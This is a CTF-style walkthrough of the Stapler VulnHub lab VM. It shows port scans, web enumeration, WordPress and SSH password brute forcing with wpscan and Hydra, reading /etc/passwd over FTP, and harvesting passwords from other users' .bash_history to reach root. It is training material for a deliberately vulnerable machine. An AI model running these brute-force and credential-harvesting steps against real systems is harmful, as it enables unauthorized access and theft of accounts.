He110 w0rld! Today i will be sharing a guide to completing the Stapler VM hosted on VulnHub. This VM was created by the one and only @
g0tmi1k.
As always there will be spoilers within this guide so use as little or as much as you need.
***With all these VMs there are always multiple ways to r00t the box***
+---------------------------------------------------------+
| |
| __..--''\ |
| __..--'' \ |
| __..--'' __..--'' |
| __..--'' __..--'' | |
| \ o __..--''____....----"" |
| \__..--''\ |
| | \ |
| +----------------------------------+ |
| +----------------------------------+ |
| |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| Name: Stapler | IP: DHCP |
| Date: 2016-June-08 | Goal: Get Root! |
| Author: g0tmi1k | Difficultly: ??? ;) |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| |
| + Average beginner/intermediate VM, only a few twists |
| + May find it easy/hard (depends on YOUR background) |
| + ...also which way you attack the box |
| |
| + It SHOULD work on both VMware and Virtualbox |
| + REBOOT the VM if you CHANGE network modes |
| + Fusion users, you'll need to retry when importing |
| |
| + There are multiple methods to-do this machine |
| + At least two (2) paths to get a limited shell |
| + At least three (3) ways to get a root access |
| |
| + Made for BsidesLondon 2016 |
| + Slides: https://download.vulnhub.com/media/stapler/ |
| |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman |
| + ...and shout-outs to the VulnHub-CTF Team =) |
| |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
| |
| --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- |
| |
+---------------------------------------------------------+
Lets reap some bytes...
Discovery
Command: netdiscover -r 192.168.153.0/24
***Please note your IP Range can/will differ***
0 | Currently scanning: 192.168.153.0/24 | Screen View: Unique Hosts |
1 | 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 |
2 | _____________________________________________________________________________ |
3 | IP At MAC Address Count Len MAC Vendor / Hostname |
4 | ----------------------------------------------------------------------------- |
5 | 192.168.153.1 00:50:56:c0:00:01 1 60 VMware, Inc. |
6 | 192.168.153.142 00:0c:29:8b:3c:14 1 60 VMware, Inc. |
7 | 192.168.153.254 00:50:56:f8:e3:7b 1 60 VMware, Inc. |
Enumeration
Command: nmap -sS -Pn -p1-65535 192.168.153.142
0 | root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142 |
1 | Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT |
2 | Nmap scan report for Red.Initech (192.168.153.142) |
3 | Host is up (0.00023s latency). |
4 | Not shown: 65523 filtered ports |
5 | PORT STATE SERVICE |
6 | 20/tcp closed ftp-data |
7 | 21/tcp open ftp |
8 | 22/tcp open ssh |
9 | 53/tcp open domain |
10 | 80/tcp open http |
11 | 123/tcp closed ntp |
12 | 137/tcp closed netbios-ns |
13 | 138/tcp closed netbios-dgm |
14 | 139/tcp open netbios-ssn |
15 | 666/tcp open doom |
16 | 3306/tcp open mysql |
17 | 12380/tcp open unknown |
18 | MAC Address: 00:0C:29:8B:3C:14 (VMware) |
Lots of fun stuff to play with.
Service Exploration
FTP
0 | root@lulb0x:~# ftp 192.168.153.142 |
1 | Connected to 192.168.153.142. |
2 | 220- |
3 | 220-|-----------------------------------------------------------------------------------------| |
4 | 220-| Harry, make sure to update the banner when you get a chance to show who has access here | |
5 | 220-|-----------------------------------------------------------------------------------------| |
6 | 220- |
7 | 220 |
8 | Name (192.168.153.142:root): Anonymous |
9 | 331 Please specify the password. |
10 | Password: |
11 | 230 Login successful. |
12 | Remote system type is UNIX. |
13 | Using binary mode to transfer files. |
14 | ftp> ls |
15 | 200 PORT command successful. Consider using PASV. |
16 | 150 Here comes the directory listing. |
17 | -rw-r--r-- 1 0 0 107 Jun 03 23:06 note |
18 | 226 Directory send OK. |
19 | ftp> get note |
20 | local: note remote: note |
21 | 200 PORT command successful. Consider using PASV. |
22 | 150 Opening BINARY mode data connection for note (107 bytes). |
23 | 226 Transfer complete. |
24 | 107 bytes received in 0.00 secs (50.0442 kB/s) |
25 | ftp> exit |
Interesting a potential user Harry i will add this to the list of potential users.
Reading our loot (note) reveals...
0 | root@lulb0x:~# cat note |
1 | Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. |
Once again more potential users elly and john.
With nothing more to see / do in the FTP realm at this time we move on.
SSH
Usually there is nothing to gain from trying to SSH at this point but i always connect just to see if the banner (assuming there is one) has any hints that we can put away for a later time.
0 | root@lulb0x:~# ssh 192.168.153.142 |
1 | ----------------------------------------------------------------- |
2 | ~ Barry, don't forget to put a message here ~ |
3 | ----------------------------------------------------------------- |
4 | root@192.168.153.142's password: |
Sweet, another potential user barry... at this point we can try to brute force the ssh service but i will hold off abit longer just in case. No need to make more noise
at this point.
666 - The port of the beast!!!
0 | root@lulb0x:~# nc 192.168.153.142 666 |
1 | PK d��Hp� ��, 2 |
2 | message2.jpgUT +�QWJ�QWux |
3 | � �z |
4 | T ���P���A@� �UT�T � 2>��RDK �Jj�"DL[E� |
5 | 0<Ĵ�ʮn���V �W�H � |
Brutal... Looks like someone wants me to have a file of some sort.
Command: nc 192.168.153.142 666 > SatanicFile
0 | root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File |
1 | Satanic_File: Zip archive data, at least v2.0 to extract |
So our Satanic_File seems to be a Zip file.
Command: Unzip Satanic_File
0 | root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip |
1 | Archive: Satanic_File.zip |
2 | inflating: message2.jpg |
So the unzip reveals a JPG that has a message that displays.
Great yet another potential user: scott
Now, i have been burned a couple times in these VMs by not checking out the jpgs for hidden messages. So i always run strings on the images.
Command: strings message2.jpg
0 | JFIF |
1 | vPhotoshop 3.0 |
2 | 8BIM |
3 | 1If you are reading this, you should get a cookie! |
If you are reading this you should get a cookie.....no thanks, i dont eat cookies, i steal them :) Seems that there is nothing else to to with Satans Port. So we move along.
Port 12380
Trying to figure out what port 12380 contains with netcat was pretty simple.
Interesting a webpage with 3 more peoples names:
dave
tim
zoe
Port 80 /12380 : Http(s?)
Since we know that 12380 turned out to be a website we can now run nikto and dirb/dirbuster against them.
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142
0 | root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142 |
1 | - Nikto v2.1.6 |
2 | --------------------------------------------------------------------------- |
3 | + Target IP: 192.168.153.142 |
4 | + Target Hostname: 192.168.153.142 |
5 | + Target Port: 80 |
6 | + Start Time: 2016-06-27 10:56:46 (GMT-4) |
7 | --------------------------------------------------------------------------- |
8 | + Server: No banner retrieved |
9 | + The anti-clickjacking X-Frame-Options header is not present. |
10 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS |
11 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type |
12 | + No CGI Directories found (use '-C all' to force check all possible dirs) |
13 | + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. |
14 | + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. |
15 | + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response |
16 | + Scan terminated: 20 error(s) and 5 item(s) reported on remote host |
17 | + End Time: 2016-06-27 10:56:58 (GMT-4) (12 seconds) |
18 | --------------------------------------------------------------------------- |
19 | + 1 host(s) tested |
20 | ----------------- |
21 | DIRB v2.22 |
22 | By The Dark Raver |
23 | ----------------- |
24 | START_TIME: Mon Jun 27 10:56:58 2016 |
25 | URL_BASE: http://192.168.153.142/ |
26 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt |
27 | ----------------- |
28 | GENERATED WORDS: 4612 |
29 | ---- Scanning URL: http://192.168.153.142/ ---- |
30 | + http://192.168.153.142/.bashrc (CODE:200|SIZE:3771) |
31 | + http://192.168.153.142/.profile (CODE:200|SIZE:675) |
32 | ----------------- |
33 | END_TIME: Mon Jun 27 10:57:02 2016 |
34 | DOWNLOADED: 4612 - FOUND: 2 |
We can see that it initially finds 2 files: .bashrc and .profile.
Looking quickly i didn't find anything of earth-shattering awesome sauce so i moved on to 12380
Command: nikto -host 192.168.153.142 -port 12380;
0 | root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380; |
1 | - Nikto v2.1.6 |
2 | --------------------------------------------------------------------------- |
3 | + Target IP: 192.168.153.142 |
4 | + Target Hostname: 192.168.153.142 |
5 | + Target Port: 12380 |
6 | --------------------------------------------------------------------------- |
7 | + SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?
/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost |
8 | Ciphers: ECDHE-RSA-AES256-GCM-SHA384 |
9 | Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?
/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost |
10 | + Start Time: 2016-06-27 11:01:00 (GMT-4) |
11 | --------------------------------------------------------------------------- |
12 | + Server: Apache/2.4.18 (Ubuntu) |
13 | + Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 |
14 | + The anti-clickjacking X-Frame-Options header is not present. |
15 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS |
16 | + Uncommon header 'dave' found, with contents: Soemthing doesn't look right here |
17 | + The site uses SSL and the Strict-Transport-Security HTTP header is not defined. |
18 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type |
19 | + No CGI Directories found (use '-C all' to force check all possible dirs) |
20 | + Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200) |
21 | + Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200) |
22 | + "robots.txt" contains 2 entries which should be manually viewed. |
23 | + Hostname '192.168.153.142' does not match certificate's names: Red.Initech |
24 | + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS |
25 | + Uncommon header 'x-ob_mode' found, with contents: 1 |
26 | + OSVDB-3233: /icons/README: Apache default file found. |
27 | + /phpmyadmin/: phpMyAdmin directory found |
28 | + 7690 requests: 0 error(s) and 14 item(s) reported on remote host |
29 | + End Time: 2016-06-27 11:02:40 (GMT-4) (100 seconds) |
So we are getting a ssl cert and we get another user: pam.
Also, we get 2 folders from the robots.txt file:
admin112233
blogblog (potentially a cms) nice.
Navigating to https://192.168.153.142:12380/admin112233 gives us the following (did you get caught :) )
Moving on...
blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a rev shell or RCE.
For this next part i am going to use
wpscan to find everything of value (If you are looking for another awesome tutorial, a video one, check out
https://7ms.us Brian does a great job of explaining what flags to use for wpscan. Thanks Brian
@7minsec)
Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a
0 | _______________________________________________________________ |
1 | __ _______ _____ |
2 | \ \ / / __ \ / ____| |
3 | \ \ /\ / /| |__) | (___ ___ __ _ _ __ |
4 | \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ |
5 | \ /\ / | | ____) | (__| (_| | | | | |
6 | \/ \/ |_| |_____/ \___|\__,_|_| |_| |
7 | WordPress Security Scanner by the WPScan Team |
8 | Version 2.9.1 |
9 | Sponsored by Sucuri - https://sucuri.net |
10 | @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ |
11 | _______________________________________________________________ |
12 | [+] URL: https://192.168.153.142:12380/blogblog/ |
13 | [+] Started: Mon Jun 27 11:17:31 2016 |
14 | [!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number |
15 | [+] Interesting header: DAVE: Soemthing doesn't look right here |
16 | [+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu) |
17 | [!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register |
18 | [+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php |
19 | [!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/ |
20 | [!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/ |
21 | [+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27) |
22 | [!] 21 vulnerabilities identified from the version number |
So we know that it is running version 4.2.1 with 21 vulnerabilities...nice... But i want to see what (if any) users could be found.
0 | [+] Enumerating usernames ... |
1 | [+] Identified the following 16 user/s: |
2 | +----+---------+-----------------+ |
3 | | Id | Login | Name | |
4 | +----+---------+-----------------+ |
5 | | 1 | john | John Smith | |
6 | | 2 | elly | Elly Jones | |
7 | | 3 | peter | Peter Parker | |
8 | | 4 | barry | Barry Atkins | |
9 | | 5 | heather | Heather Neville | |
10 | | 6 | garry | garry | |
11 | | 7 | harry | harry | |
12 | | 8 | scott | scott | |
13 | | 9 | kathy | kathy | |
14 | | 10 | tim | tim | |
15 | | 11 | zoe | ZOE | |
16 | | 12 | dave | Dave | |
17 | | 13 | simon | Simon | |
18 | | 14 | abby | Abby | |
19 | | 15 | vicki | Vicki | |
20 | | 16 | pam | Pam | |
21 | +----+---------+-----------------+ |
Damn.... Thats alot of users, some of which look pretty familiar:
pam
dave
zoe
tim
garry
harry
barry
peter
john
elly
I remember seeing a message for elly stating that there was a payload waiting for her in her ftp account... or something like that. lets see if wpscan can brute her password.
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly
****NOTE: rockyou_5max.txt is just the rockyou list but only the words that are 5 chars or less****
****NOTE v2.0: I created a bruteforcer in python for finding the password also, as a codemonkey i feel the need to always try on my own. If anyone wants it feel free to leave a comment and i can share with you****
0 | [+] Enumerating plugins from passive detection ... |
1 | [+] No plugins found |
2 | [+] Starting the password brute forcer |
3 | [+] [SUCCESS] Login : elly Password : ylle |
4 | Brute Forcing 'elly' Time: 00:18:01 |
5 | +----+-------+------+----------+ |
6 | | Id | Login | Name | Password | |
7 | +----+-------+------+----------+ |
8 | | | elly | | ylle | |
9 | +----+-------+------+----------+ |
10 | [+] Finished: Mon Jun 27 11:46:55 2016 |
11 | [+] Requests Done: 99717 |
12 | [+] Memory used: 42.395 MB |
13 | [+] Elapsed time: 00:18:04 |
Ooh... elly was cracked with the password of ylle.
Lets switch back and try her credentials on the ftp service and see if we get lucky with some password reuse.
0 | root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142 |
1 | Connected to 192.168.153.142. |
2 | 220- |
3 | 220-|-----------------------------------------------------------------------------------------| |
4 | 220-| Harry, make sure to update the banner when you get a chance to show who has access here | |
5 | 220-|-----------------------------------------------------------------------------------------| |
6 | 220- |
7 | 220 |
8 | Name (192.168.153.142:root): elly |
9 | 331 Please specify the password. |
10 | Password: |
11 | 230 Login successful. |
12 | Remote system type is UNIX. |
13 | Using binary mode to transfer files. |
Bingo... but what can we see
Command: ls
0 | ftp> ls |
1 | 200 PORT command successful. Consider using PASV. |
2 | 150 Here comes the directory listing. |
3 | drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11 |
4 | drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi |
5 | -rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf |
6 | -rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases |
7 | -rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db |
8 | drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives |
9 | drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2 |
10 | drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor |
11 | drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d |
12 | drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport |
13 | drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt |
14 | -rw-r----- 1 0 1 144 Jan 14 23:35 at.deny |
15 | drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind |
16 | -rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc |
17 | drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d |
18 | -rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist |
19 | drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d |
20 | drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu |
21 | drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates |
22 | -rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf |
23 | drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup |
24 | drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d |
25 | drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily |
26 | drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly |
27 | drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly |
28 | drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly |
29 | -rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab |
30 | -rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab |
31 | drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common |
32 | drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1 |
33 | -rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf |
34 | -rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version |
35 | drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default |
36 | -rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf |
37 | drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d |
38 | drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp |
39 | -rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf |
40 | drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d |
41 | drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg |
42 | -rw-r--r-- 1 0 0 96 Apr 20 23:09 environment |
43 | drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts |
44 | -rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab |
/etc = lulz lets grab the passwd file and see if any of our potential users are actual users
Command: get passwd
0 | ftp> get passwd |
1 | local: passwd remote: passwd |
2 | 200 PORT command successful. Consider using PASV. |
3 | 150 Opening BINARY mode data connection for passwd (2908 bytes). |
4 | 226 Transfer complete. |
5 | 2908 bytes received in 0.00 secs (6.6826 MB/s) |
Command: cat passwd | grep bash | cut -d':' -f1
0 | RNunemaker |
1 | ETollefson |
2 | DSwanger |
3 | AParnell |
4 | SHayslett |
5 | MBassin |
6 | JBare |
7 | LSolum |
8 | MFrei |
9 | SStroud |
10 | JKanode |
11 | CJoo |
12 | Drew |
13 | jess |
14 | SHAY |
15 | mel |
16 | zoe |
17 | NATHAN |
18 | elly |
Okay time to let hydra do what it does best.
Command: hydra -L Actual_Users -P /usr/share/john/password.lst ssh://192.168.153.142 -t 15 -u
0 | root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u |
1 | Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. |
2 | Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14 |
3 | [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 |
4 | [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... |
5 | [DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task |
6 | [DATA] attacking service ssh on port 22 |
7 | [STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active |
8 | [22][ssh] host: 192.168.153.142 login: Drew password: qwerty |
9 | [STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active |
10 | [22][ssh] host: 192.168.153.142 login: JBare password: cookie |
Using the credentials JBare:cookie
Trying to cut some corners, since it seems that all the home folders are public readable....
Command: cat */.bash_history
0 | JBare@red:/home$ cat */.bash_history |
1 | exit |
2 | free |
3 | exit |
4 | exit |
5 | exit |
6 | exit |
7 | exit |
8 | exit |
9 | exit |
10 | exit |
11 | top |
12 | ps aux |
13 | exit |
14 | exit |
15 | exit |
16 | id |
17 | whoami |
18 | ls -lah |
19 | pwd |
20 | ps aux |
21 | sshpass -p thisimypassword ssh JKanode@localhost |
22 | apt-get install sshpass |
23 | sshpass -p JZQuyIN5 peter@localhost |
24 | ps -ef |
25 | top |
26 | kill -9 3747 |
27 | exit |
28 | exit |
29 | exit |
30 | exit |
31 | exit |
32 | whoami |
33 | exit |
34 | exit |
35 | exit |
36 | exit |
37 | exit |
38 | cat: peter/.bash_history: Permission denied |
39 | exit |
40 | exit |
41 | exit |
42 | exit |
43 | exit |
44 | exit |
45 | id |
46 | top |
47 | exit |
Nice... 2 more sets of credentials
JKanode:thisismypassword
peter:JZQuyIN5
I am going to try peters credentials first because he has a stronger password...i would like to believe he is a sudoer at a minimum.
Jackpot...peter has full root access with a sudo su we get root and claim our flag
I would like to thank G0tMi1k and Vulnhub and all the testers. This was a very fun VM.